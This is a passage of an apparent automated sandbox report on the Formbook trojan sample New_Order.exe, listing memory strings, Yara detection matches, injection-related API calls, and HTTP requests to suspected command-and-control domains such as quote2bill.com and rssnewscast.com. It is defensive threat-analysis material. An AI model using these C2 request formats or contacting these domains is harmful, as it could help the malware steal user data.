            Source: wextract.exe, 00000013.00000003.2041629441.0000000007E33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
            Source: wextract.exe, 00000013.00000002.4169629780.0000000007D38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: wextract.exe, 00000013.00000002.4167723777.0000000005886000.00000004.10000000.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000002D16000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2093049974.000000000C436000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_
            Source: firefox.exe, 0000001A.00000002.2093049974.000000000C436000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.sedo.com/services/parking.php3
            Source: wextract.exe, 00000013.00000002.4169473954.0000000007A60000.00000004.00000800.00020000.00000000.sdmp, wextract.exe, 00000013.00000002.4167723777.0000000006384000.00000004.10000000.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000003814000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.eu/knowledgebase/entry/284-start-sending-receiving-email-domain/
            Source: wextract.exe, 00000013.00000002.4169473954.0000000007A60000.00000004.00000800.00020000.00000000.sdmp, wextract.exe, 00000013.00000002.4167723777.0000000006384000.00000004.10000000.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000003814000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.eu/knowledgebase/zoeken/
            Source: wextract.exe, 00000013.00000002.4169473954.0000000007A60000.00000004.00000800.00020000.00000000.sdmp, wextract.exe, 00000013.00000002.4167723777.0000000006384000.00000004.10000000.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000003814000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.eu/privacy-policy/
            Source: wextract.exe, 00000013.00000002.4169473954.0000000007A60000.00000004.00000800.00020000.00000000.sdmp, wextract.exe, 00000013.00000002.4167723777.0000000006384000.00000004.10000000.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000003814000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.eu/question/100000230
            Source: wextract.exe, 00000013.00000002.4169473954.0000000007A60000.00000004.00000800.00020000.00000000.sdmp, wextract.exe, 00000013.00000002.4167723777.0000000006384000.00000004.10000000.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000003814000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.eu/question/110000576/
            Source: wextract.exe, 00000013.00000002.4169473954.0000000007A60000.00000004.00000800.00020000.00000000.sdmp, wextract.exe, 00000013.00000002.4167723777.0000000006384000.00000004.10000000.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000003814000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.eu/question/110000577/
            Source: MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000003814000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.eu/services/search-domains/
            Source: wextract.exe, 00000013.00000002.4169473954.0000000007A60000.00000004.00000800.00020000.00000000.sdmp, wextract.exe, 00000013.00000002.4167723777.0000000006384000.00000004.10000000.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000003814000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.eu/terms-of-service/
            Source: wextract.exe, 00000013.00000002.4169473954.0000000007A60000.00000004.00000800.00020000.00000000.sdmp, wextract.exe, 00000013.00000002.4167723777.0000000006384000.00000004.10000000.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000003814000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/algemene-voorwaarden/
            Source: wextract.exe, 00000013.00000002.4169473954.0000000007A60000.00000004.00000800.00020000.00000000.sdmp, wextract.exe, 00000013.00000002.4167723777.0000000006384000.00000004.10000000.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000003814000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/knowledgebase/zoeken/
            Source: wextract.exe, 00000013.00000002.4169473954.0000000007A60000.00000004.00000800.00020000.00000000.sdmp, wextract.exe, 00000013.00000002.4167723777.0000000006384000.00000004.10000000.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000003814000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/privacy-policy/
            Source: MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000003814000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/services/search-domains/
            Source: wextract.exe, 00000013.00000002.4169473954.0000000007A60000.00000004.00000800.00020000.00000000.sdmp, wextract.exe, 00000013.00000002.4167723777.0000000006384000.00000004.10000000.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000003814000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/vragen/110000534/
            Source: wextract.exe, 00000013.00000002.4169473954.0000000007A60000.00000004.00000800.00020000.00000000.sdmp, wextract.exe, 00000013.00000002.4167723777.0000000006384000.00000004.10000000.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000003814000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/vragen/110000572
            Source: wextract.exe, 00000013.00000002.4169473954.0000000007A60000.00000004.00000800.00020000.00000000.sdmp, wextract.exe, 00000013.00000002.4167723777.0000000006384000.00000004.10000000.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000003814000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/vragen/110000580/
            Source: wextract.exe, 00000013.00000002.4169473954.0000000007A60000.00000004.00000800.00020000.00000000.sdmp, wextract.exe, 00000013.00000002.4167723777.0000000006384000.00000004.10000000.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166780563.0000000003814000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/vragen/198/
            Source: unknownHTTP traffic detected: POST /fdo5/ HTTP/1.1Host: www.quote2bill.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateOrigin: http://www.quote2bill.comReferer: http://www.quote2bill.com/fdo5/Content-Type: application/x-www-form-urlencodedCache-Control: no-cacheConnection: closeContent-Length: 187User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoData Raw: 35 34 30 48 32 78 3d 4a 43 62 6c 6e 78 70 68 31 6f 52 71 52 76 56 50 7a 41 63 73 4a 6c 4b 43 70 41 42 31 56 55 64 75 74 56 45 46 59 46 75 43 6d 56 62 77 4c 74 70 37 74 68 75 6c 41 6b 55 71 31 75 63 38 4e 32 55 6c 4e 4f 46 55 78 4b 47 49 56 37 34 30 32 41 73 52 77 30 6d 56 50 70 73 67 6e 4f 73 5a 6c 52 41 5a 73 31 36 34 7a 31 79 66 72 4d 4f 76 30 53 53 32 52 66 76 41 59 66 4b 68 6a 36 79 30 4f 74 2b 64 4b 42 2b 59 4b 74 52 64 45 50 61 73 39 73 63 64 37 4a 43 49 2b 79 4d 35 66 35 5a 5a 59 57 32 4a 77 66 46 4c 65 44 42 43 42 76 54 49 6e 70 50 6a 54 41 3d 3d Data Ascii: 540H2x=JCblnxph1oRqRvVPzAcsJlKCpAB1VUdutVEFYFuCmVbwLtp7thulAkUq1uc8N2UlNOFUxKGIV7402AsRw0mVPpsgnOsZlRAZs164z1yfrMOv0SS2RfvAYfKhj6y0Ot+dKB+YKtRdEPas9scd7JCI+yM5f5ZZYW2JwfFLeDBCBvTInpPjTA==
            Source: unknownDNS traffic detected: queries for: www.rssnewscast.com
            Source: global trafficHTTP traffic detected: GET /fdo5/?fXUX=ShJ8DFcXvtj84pw&540H2x=65uPmj+z4VpNJqA9pxY4t334WX7Mhk7tiYzSNqqY5uLzfvAkeCdzENkJlXyLUTYzEELB4+YwfPYf7gdekS/nySqpdkWMB4I85w== HTTP/1.1Host: www.rssnewscast.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /fdo5/?fXUX=ShJ8DFcXvtj84pw&540H2x=EAzFkHRwipdrFLRPzn8XfH22pTdKYWJnyl4LcH+flh+EU/cAs0/QFXMo9vl/d0UKRaBGjYTaeopZ/0cAzgqORqEzisMthiMtgw== HTTP/1.1Host: www.quote2bill.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /fdo5/?fXUX=ShJ8DFcXvtj84pw&540H2x=inoojyPYY1WC9wcQL3KibnMAdvhtstHROTevXGeSx6okq+Nf2nPGtK9KaHajuwb+0LfF1HdY3MAFMtPUKPMp3iU3/gDoogh+Wg== HTTP/1.1Host: www.fdissolutions.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /fdo5/?540H2x=5TdxL1jawfl3Ka3qvJ6r7WEnhl9d9FSMp+F3J8Z8WOIoZyaqSH32l6+4J8Kvi3fjVro4t5UeAoiyMZT16OgV/jIcRYbasIDnmQ==&fXUX=ShJ8DFcXvtj84pw HTTP/1.1Host: www.pay4dance.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /fdo5/?fXUX=ShJ8DFcXvtj84pw&540H2x=o5wSqUvF0rpSj/QsxVSIlr771lB1q2yaUHYHmevxRJiNXHXH1dMi1Tu8dx6k0Oesk6U+KD/q+MB1YEvRLC9XlweWTzImNrywBQ== HTTP/1.1Host: www.busan3-200.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /fdo5/?540H2x=tmpHADT4fdGVd6nnK8VfxTcjTEmAMjvmemW+C4Ol5iYH1IbYxa+keO9dRydEANAVQTW4GcRzv85KoC+8HtmJLO5vdlfv2fS0QQ==&fXUX=ShJ8DFcXvtj84pw HTTP/1.1Host: www.wrautomotive.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /fdo5/?540H2x=xa2waNrdOCjpAmfef8jorByukH+EVFd5YbvOdmGsq1/UoTy2yLdiy8uLwcrb3pQUM2TyiZx+d9zg30LTCTeZqohwWyqWM8Qwrg==&fXUX=ShJ8DFcXvtj84pw HTTP/1.1Host: www.poria.linkAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /fdo5/?fXUX=ShJ8DFcXvtj84pw&540H2x=EQwTHp3RZGFUPSUcH+83d++sEHXiHecksK53+uRoarOYzym5WINU/nAp376IAi0Fnc8MDGSrPwcAz9k7VILN2J3NqNX7kas5xg== HTTP/1.1Host: www.kasegitai.tokyoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko

            E-Banking Fraud

            Source: Yara matchFile source: 10.2.New_Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.New_Order.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000A.00000002.1845613526.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.4164625509.0000000002F40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.4166864709.0000000004F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.4168479789.0000000004C70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.4166481175.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.1853449511.0000000001130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.1910322852.0000000000700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.1910549824.0000000002CB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.4166642046.00000000037D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.4166636409.0000000002960000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.1865768536.00000000015A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 10.2.New_Order.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 10.2.New_Order.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000A.00000002.1845613526.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000013.00000002.4164625509.0000000002F40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000013.00000002.4166864709.0000000004F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000017.00000002.4168479789.0000000004C70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000013.00000002.4166481175.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000A.00000002.1853449511.0000000001130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000015.00000002.1910322852.0000000000700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000012.00000002.1910549824.0000000002CB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000014.00000002.4166642046.00000000037D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000D.00000002.4166636409.0000000002960000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000A.00000002.1865768536.00000000015A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: initial sampleStatic PE information: Filename: New_Order.exe
            Source: New_Order.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 10.2.New_Order.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 10.2.New_Order.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000A.00000002.1845613526.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000013.00000002.4164625509.0000000002F40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000013.00000002.4166864709.0000000004F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000017.00000002.4168479789.0000000004C70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000013.00000002.4166481175.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000A.00000002.1853449511.0000000001130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000015.00000002.1910322852.0000000000700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000012.00000002.1910549824.0000000002CB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000014.00000002.4166642046.00000000037D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000D.00000002.4166636409.0000000002960000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000A.00000002.1865768536.00000000015A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: String function: 014AEA12 appears 36 times
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: String function: 01487E54 appears 96 times
            Source: C:\Users\user\Desktop\New_Order.exeCode function: String function: 012C5130 appears 58 times
            Source: C:\Users\user\Desktop\New_Order.exeCode function: String function: 0127B970 appears 262 times
            Source: C:\Users\user\Desktop\New_Order.exeCode function: String function: 012FEA12 appears 86 times
            Source: C:\Users\user\Desktop\New_Order.exeCode function: String function: 012D7E54 appears 99 times
            Source: C:\Users\user\Desktop\New_Order.exeCode function: String function: 0130F290 appears 103 times
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0040A163 NtSetContextThread,10_2_0040A163
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_004281B3 NtClose,10_2_004281B3
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0040A9B3 NtMapViewOfSection,10_2_0040A9B3
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0040B283 NtDelayExecution,10_2_0040B283
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0040A373 NtResumeThread,10_2_0040A373
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0040ABE3 NtCreateFile,10_2_0040ABE3
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_00409D43 NtSuspendThread,10_2_00409D43
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0040AE13 NtReadFile,10_2_0040AE13
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0040B6A3 NtAllocateVirtualMemory,10_2_0040B6A3
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_00409F53 NtGetContextThread,10_2_00409F53
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0040A793 NtCreateSection,10_2_0040A793
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C2B60 NtClose,LdrInitializeThunk,10_2_012C2B60
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C2DF0 NtQuerySystemInformation,LdrInitializeThunk,10_2_012C2DF0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C2C70 NtFreeVirtualMemory,LdrInitializeThunk,10_2_012C2C70
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C35C0 NtCreateMutant,LdrInitializeThunk,10_2_012C35C0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C4340 NtSetContextThread,10_2_012C4340
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C4650 NtSuspendThread,10_2_012C4650
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C2BA0 NtEnumerateValueKey,10_2_012C2BA0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C2B80 NtQueryInformationFile,10_2_012C2B80
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C2BE0 NtQueryValueKey,10_2_012C2BE0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C2BF0 NtAllocateVirtualMemory,10_2_012C2BF0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C2AB0 NtWaitForSingleObject,10_2_012C2AB0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C2AF0 NtWriteFile,10_2_012C2AF0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C2AD0 NtReadFile,10_2_012C2AD0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C2D30 NtUnmapViewOfSection,10_2_012C2D30
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C2D00 NtSetInformationFile,10_2_012C2D00
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C2D10 NtMapViewOfSection,10_2_012C2D10
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C2DB0 NtEnumerateKey,10_2_012C2DB0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C2DD0 NtDelayExecution,10_2_012C2DD0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C2C00 NtQueryInformationProcess,10_2_012C2C00
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C2C60 NtCreateKey,10_2_012C2C60
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C2CA0 NtQueryInformationToken,10_2_012C2CA0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C2CF0 NtOpenProcess,10_2_012C2CF0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C2CC0 NtQueryVirtualMemory,10_2_012C2CC0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C2F30 NtCreateSection,10_2_012C2F30
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C2F60 NtCreateProcessEx,10_2_012C2F60
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C2FA0 NtQuerySection,10_2_012C2FA0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C2FB0 NtResumeThread,10_2_012C2FB0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C2F90 NtProtectVirtualMemory,10_2_012C2F90
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C2FE0 NtCreateFile,10_2_012C2FE0
